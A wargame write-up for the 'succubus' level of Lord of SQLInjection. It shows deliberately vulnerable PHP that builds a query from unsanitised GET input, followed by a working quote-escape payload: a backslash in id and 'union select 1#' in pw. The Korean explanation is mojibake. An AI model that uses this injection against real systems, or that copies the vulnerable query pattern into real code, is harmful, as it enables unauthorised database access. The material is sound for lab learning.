1. Code
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/\'/',$_GET[id])) exit("HeHe");
if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("succubus");
highlight_file(__FILE__);
?>
2. Condition
- ์์ ๋ฐ์ดํ๋ฅผ ํํฐ๋งํ๋ค.
3. Solution
Single Quote๋ฅผ ์ ๋ ฅํ์ฌ ์ ํด์ง ์ฟผ๋ฆฌ์์ ๋ฒ์ด๋์ผ ํ๋ค.
ํ์ง๋ง, '๋ ํํฐ๋ง ๋์๊ธฐ ๋๋ฌธ์ ๋ค๋ฅธ ๋ฐฉ๋ฒ์ ์ฐพ์๋ณด์๋ค.
๋ฐ๋ก ์ฟผ๋ฆฌ์ Single Quote๋ฅผ Escaping ์ํค๋ ๊ฒ์ด๋ค.
๊ตฌ์ฒด์ ์ธ ์ค๋ช ์ ๋ค์๊ณผ ๊ฐ๋ค.
"select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"
์ ์ฟผ๋ฆฌ์์ id, pw์ ์๋ ๊ฐ์ ๋ณด๋ธ๋ค๊ณ ํด๋ณด์.
| ๋ณ์๋ช | ๊ฐ |
| id | \ |
| pw | union select 1# |
"select id from prob_succubus where id='\' and pw=' union select 1#'"
์๋ ์๋ Single Quote๊ฐ ๋ฌธ์์ฒ๋ฆฌ ๋๋ฉด์, pw๊ฐ์ด sql๊ตฌ๋ฌธ์ผ๋ก ๋ค์ด๊ฐ๋ค.
์.. ์ด๊ฒ ๋์ด๋ค.
4. Injection
๋๋ณด๊ธฐ
img_1 succubus clear
์๋ ๊ฐ์ ๋ณด๋ด์ฃผ๋ฉด ๋ฌธ์ ๊ฐ ํด๊ฒฐ๋๋ค.
| ๋ณ์๋ช | ๊ฐ |
| id | \ |
| pw | union select 1# |
'wargame ๐ดโโ ๏ธ write-up > Lord of SQLInjection' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
| nightmare (0) | 2023.08.03 |
|---|---|
| zombie_assasin (0) | 2023.08.03 |
| assasin (0) | 2023.08.01 |
| giant (0) | 2023.08.01 |